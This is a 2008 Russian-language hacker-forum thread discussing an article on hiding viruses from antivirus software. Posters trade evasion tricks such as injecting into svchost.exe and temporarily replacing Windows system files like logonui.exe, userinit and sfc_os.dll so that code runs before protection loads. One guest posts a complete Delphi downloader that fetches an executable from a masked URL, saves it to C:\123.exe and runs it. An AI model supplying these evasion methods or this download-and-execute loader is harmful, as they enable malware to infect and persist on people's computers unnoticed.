Маскировка вируса
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Маскировка вируса - 2008-05-05 21:13:41.396666
|
|
|
ArtAdmin
Сообщений: 11556
Оценки: 14
Присоединился: 2007-01-17 16:55:01.430000
|
Обсуждение статьи "Маскировка вируса"
|
|
|
|
|
RE: Маскировка вируса - 2008-05-05 21:13:41.600000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
отстой, старые способы, уже даже самый минусовый антивирь такое не пропустит
|
|
|
|
|
отстой, старые способы - 2008-05-05 23:09:19.040000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
ну эт как извратица, предложена лишь идея…
|
|
|
|
|
RE: Маскировка вируса - 2008-05-06 13:16:08.876666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
сначала проверь а потом говори - все работает
|
|
|
|
|
RE: Маскировка вируса - 2008-05-07 01:24:25.506666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Неплохая статья, а вот Гости странные какие-то.
|
|
|
|
|
RE: Маскировка вируса - 2008-05-07 09:54:58.820000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
проактивка палит эти способы!!! не именно сам файл, а внедрение в svchost.exe
|
|
|
|
|
RE: Маскировка вируса - 2008-05-07 11:50:30.900000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Нормальная статья.
|
|
|
|
|
RE: Маскировка вируса - 2008-05-07 12:25:36.666666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
а про проактив читай последнюю часть статьи
|
|
|
|
|
RE: Маскировка вируса - 2008-05-07 18:44:33.436666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Простым добавление строк не обойдешся. антивирусы даже кусочек выруа(наже намек на него на странице сайта) застукают
|
|
|
|
|
RE: Маскировка вируса - 2008-05-08 03:31:22.223333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Какое к черту разделение? WTF? если прога будет лезть к svchost-у, то какая в з разница, с условием она это делает или без? Бред, достаточно перехватывать все АПИ вызовы с параметрами процессов системного каталога - и нигде это не сделано, скажешь? Мой триальный нод ловит авторан.инф на попытке доступа к свчосту, чего уж там каспер… короче сказки
а ваще, откуда такая осведомленность по поводу каспера?))
|
|
|
|
|
RE: Маскировка вируса - 2008-05-08 11:50:21.703333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
ПРО ПРОАКТИВ НАПИСАНО В КОНЦЕ СТАТЬИ!!!!!!!!
|
|
|
|
|
RE: Маскировка вируса - 2008-05-08 12:02:45.130000
|
|
|
xackich
Сообщений: 39
Оценки: 0
Присоединился: 2008-04-11 16:09:04.120000
|
так : дорогие гости, прежеде чем чтонибуть писать и ругать сею статью, прочитайте ее до конца, про проактив написано в конце статьи, кстати есть еще целая куча файлов, к-е можно заменить вместо logonui.exe, далее,второе, че вы к первому исходнику прицепились, цель статьи - это скрыть вирь от сканеров и эвристических защит!а не доступ к памяти чужих процессов и т.д.(еще раз скажу:про проактив в статье написано)
|
|
|
|
|
RE: Маскировка вируса - 2008-05-09 11:43:16.470000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
1. Guest я только потому, что админ меня здесь отказывается регистрировать (заявка была подана давно).
2. Проактив:
рекомендую всем к прочтению статьи
http://bugtraq.ru/library/security/virnsd.html
http://articles.security-bridge.com/articles/91/11602/
окно входа в венду у меня отключено совсем, только я за своей тачкой сижу, поэтому всегда под админом, что ты будешь в этом случае заменять?
если вход в систему сетевой?
если версия или сама ОС другая, какое окно ты будешь рисовать?
- юзать джойнер? свалишься на любой проактивке.
И еще: если хочешь сделать поведение непредсказуемым, то лучше сделай его зависящим от времени, ака
srand(time(NULL));
if(rand())
…
если интересно, могу поделиться идеями;)
|
|
|
|
|
RE: Маскировка вируса - 2008-05-09 16:48:03.993333
|
|
|
xackich
Сообщений: 39
Оценки: 0
Присоединился: 2008-04-11 16:09:04.120000
|
Для замены в винде есть еще целая куча таких файлов и ехе и длл, кроме logonui
|
|
|
|
|
RE: Маскировка вируса - 2008-05-09 19:06:55.970000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
>>Для замены в винде есть еще целая куча таких файлов и ехе и длл, кроме logonui
примеры?? а самое главное, что это дает???
|
|
|
|
|
RE: Маскировка вируса - 2008-05-10 09:21:52.053333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
например :user.exe,userinit половина длл-ок винды, можно дрова юзерских прог заменить, ит.д.
файлов куча
что это дает?
да то, что при замене этих файлов проактива не бузит, и файлы эти(дрова особенно), грузятся задолго до того, как антивирус сможет забузить на подозрительное действие и если такие фалы заменить, то можно безпрепятственно выполнять свой код, заменив после этого все файлы обратно
|
|
|
|
|
RE: Маскировка вируса - 2008-05-10 09:22:15.256666
|
|
|
xackich
Сообщений: 39
Оценки: 0
Присоединился: 2008-04-11 16:09:04.120000
|
например :user.exe,userinit половина длл-ок винды, можно дрова юзерских прог заменить, ит.д.
файлов куча
что это дает?
да то, что при замене этих файлов проактива не бузит, и файлы эти(дрова особенно), грузятся задолго до того, как антивирус сможет забузить на подозрительное действие и если такие фалы заменить, то можно безпрепятственно выполнять свой код, заменив после этого все файлы обратно
|
|
|
|
|
RE: Маскировка вируса - 2008-05-10 22:05:12.980000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
>>например :user.exe,userinit половина длл-ок винды, >>можно дрова юзерских прог заменить, ит.д.
>>файлов куча
1. ну инжектится в плагины, сервисы и проч. уже не ново) я сам попросил примеры, но в статье ни про что упоминаний нет
>>да то, что при замене этих файлов проактива не >>бузит, и файлы эти(дрова особенно), грузятся >>задолго до того, как антивирус сможет забузить >>на подозрительное действие и если такие фалы >>заменить, то можно безпрепятственно выполнять >>свой код, заменив после этого все файлы обратно
2. ой-ой) ну загрузочный сектор проактивом не проверяется, а сканер?)
как ты собираешься заменять юзверьские/виндовые файлы своими? Переписывать всю их функциональность со своими дополнениями, или опять джойнить? догадался, на чем свалишься?)
особенно порадовало "заменить все потом обратно")) как ты себе представляешь скрыть такую бурную сторонюю активность в системном каталоге?) т.е. у нас будет 2 дллки по хз сколько метров, играющие в чехарду?)
я ведь не из вредности, так, во имя общего блага)
|
|
|
|
|
RE: Маскировка вируса - 2008-05-11 00:44:26.590000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
гавнотема внедерение в процесс не рыскрыто а паливо будет
|
|
|
|
|
RE: Маскировка вируса - 2008-05-11 11:11:53.936666
|
|
|
xackich
Сообщений: 39
Оценки: 0
Присоединился: 2008-04-11 16:09:04.120000
|
1-е а статья не про сканер разве??
2-е на кой черт переписывать весь функционал??как будто нельзя бывший файл заранее скопировать, заменить своим , а после исполнения внедренного кода заменить все обратно (некоторые файлы в винде тупо запускаются и наш код не должен уметь принимать от системы какието параметры и т.д.),как свой код потом изменить на то,что в нем было раньше, надеюсь все знают, при этом некоторые файлы не критичны, и их можно и подпортить(например sfc_os.dll или sfc.dll и т.д.)
3-е коменты типа"гавнотема…." и подобные я вообще не рассматриваю, так как прежде чем писать , следует проверить работоспособноть методов, изложенных в статье!тем более, в статье про проверку вирустоталом говорилось, способы работают!
|
|
|
|
|
RE: Маскировка вируса - 2008-05-11 11:19:18.736666
|
|
|
xackich
Сообщений: 39
Оценки: 0
Присоединился: 2008-04-11 16:09:04.120000
|
про стороннюю активность :
да проактива каспера(другие не рассматриваю , т.к у каспера офийально самый лучший) ваще не бузит на замену системных файлов(сам проверь если не веришь, мой 7.0 - ваще 0 эмоций), ты заменяешь всегото 1 файл, весом килобайты и все! ну конечно, можно и двухгиговые дллки накрапать, если хочется, это уже дело програмера и его навыки, лично у меня сотня кило ито еле-еле!
кстати, а че мы тут спорим-то, дай мне свою аську,там и поделимся друг с другом опытом?
|
|
|
|
|
RE: Маскировка вируса - 2008-05-11 17:55:17.286666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
2xackich
проверь почту на хакере
|
|
|
|
|
RE: Маскировка вируса - 2008-05-17 09:42:59.630000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
По крайней мере работает спасибо что поделился идей! GPottter_
|
|
|
|
|
RE: Маскировка вируса - 2008-05-22 22:08:46.566666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Зашел на сайт впервые, думал че серьезное пишут, а тут, гляжу, песочница.
|
|
|
|
|
RE: Маскировка вируса - 2008-05-28 00:46:03.210000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Проверено на практике маскировка никакая Ы)
NOD32,DrWEB, и еще какаято бесплатная антивирь палят все нещадно, хоть как извращяйся)) а эвристику просто так с напаса не обойдешь..
|
|
|
|
|
RE: Маскировка вируса - 2008-05-28 00:49:23.186666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Guest Отправлено: 22.05.2008 22:08:46
RE: Маскировка вируса
Зашел на сайт впервые, думал че серьезное пишут, а тут, гляжу, песочница.
Согласен…
|
|
|
|
|
RE: Маскировка вируса - 2008-05-28 00:54:56.886666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Вообще так на затравочку попробуйте откомпилировать, и использовать свои методы (с файлом -так вообще дЭбилизм…)маскировки..
program loader;
uses
Windows,
WinInet;
var
Buf:Pointer;
SizeBuf:Cardinal = 0;
BTR:Cardinal = 2000h;
HFiles:Pointer;
Hinternet:Pointer;
HF :Cardinal = INVALID_HANDLE_VALUE;
RWfil:Cardinal = 0;
begin
Hinternet:=nil;
Hinternet:= InternetOpen('SmplWinIntDwn',0,0,0,0);
HFiles:=InternetOpenUrl(Hinternet,'http://xxx.xx.ru/files/xxx.exe',
0,0,0,0);
HF:= CreateFile('C:\123.exe',GENERIC_WRITE,FILE_SHARE_READ,Nil,
OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
GetMem(Buf,BTR);
repeat
InternetReadFile(HFiles,Buf,BTR,SizeBuf);
WriteFile(HF,Buf^,SizeBuf,RWfil,0);
until SizeBuf = 0;
CloseHandle(HF);
InternetCloseHandle(Hinternet);
HF:=INVALID_HANDLE_VALUE;
FreeMem(Buf);
WinExec('c:\123.exe',SW_SHOW);
end.
|
|
|
|
|
RE: Маскировка вируса - 2008-06-18 17:06:01.130000
|
|
|
i_am_over
Сообщений: 93
Оценки: 0
Присоединился: 2008-04-20 00:11:57.860000
|
читал читал ничего не понял))
а я слішал есть где-то статья у вас как спрятать вирь с помощью SFX-архива, кто знает где киньте ссылку а то не могу найти
|
|
|
|
|
RE: Маскировка вируса - 2008-06-27 20:31:13.906666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Мне, как новичку, полезно для общего развития, хотя реально, есть, что дополнить и исправить
|
|
|
|
|
RE: Маскировка вируса - 2008-07-02 15:20:57.400000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Можно например этот вирус найти и удалить с помощью AVS PC или AVS PC+
Антивирусная Программа AVS PC и AVS PC+ найдет все…. Новое поколение программ.
AVS Soft 2008
Совместный Продукт России Германии Японии
|
|
|
|
|
RE: Маскировка вируса - 2008-07-07 07:43:08.080000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Баян, можно поинтереснее написать…
|
|
|
|
|
RE: Маскировка вируса - 2008-07-22 16:38:49.666666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
проактивка agnitum'а в максимальном режиме отловит это дело - появится окно типа "компоненты изменены", и можно залочить это дело, причем в отличие от каспера, это окно может появиться, с того момента, как подсистема окон инициализирована - т.е. даже без входа в систему. Вот такая вот хрень с outpost…
|
|
|
|
|
RE: Маскировка вируса - 2008-07-29 18:30:38.550000
|
|
|
xackich
Сообщений: 39
Оценки: 0
Присоединился: 2008-04-11 16:09:04.120000
|
Так: фрагмент кода в начале статьи не главная ее тема!!!!зачем же его тогда ваще обсуждать?!он написан не мной я знаю что он бажный, этот код взят чисто для примера применения метода описанного в статье, я знаю что проактива все запалит но ведь про проативу в статье речь и не идет!речь идет только о самом простом способе на время скрыть вирус от антивирусных баз без знания асма
|
|
|
|
|
RE: Маскировка вируса - 2008-08-06 23:40:00.163333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
2 xackich
1е - за метод описанный в статье - баян..
2е - и речи быть не может о временном скрытии, пишите свой пакер+шифратор+перехват АПИ в кернеле, может быть на время и спрячитеся)ыы, а лучший способ прятать вири - неписать их нах)..
|
|
|
|
|
RE: Маскировка вируса - 2008-08-10 10:00:22.793333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Хорошая статья, но приличный файрволл такую самодеятельность сразу запалит
|
|
|
|
|
RE: Маскировка вируса - 2008-08-18 16:54:29.480000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Какой нax баян? Бубен рулит.
Статья ниче вроде тока Каспера такой хней не проведешь :р
|
|
|
|
|
RE: Маскировка вируса - 2008-08-24 23:47:04.430000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
2 Guest Отправлено: 18.08.2008 16:54:29
очнитесь нах!!!.. вас околдовали!!!
|
|
|
|
|
RE: Маскировка вируса - 2008-09-02 00:13:07.110000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Я могу пройти практику.
|
|
|
|
|
RE: Маскировка вируса - 2008-10-11 08:33:12.973333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Хак, +1(эт пух)=)))
|
|
|
|
|
RE: Маскировка вируса - 2008-12-24 15:30:58.993333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Жесть: горькая правда жызни. Только нужно мочить
плохих user-ов ну и оборзевшых ламеров, а не всех подряд!!! Пис братья
|
|
|
|
|
|
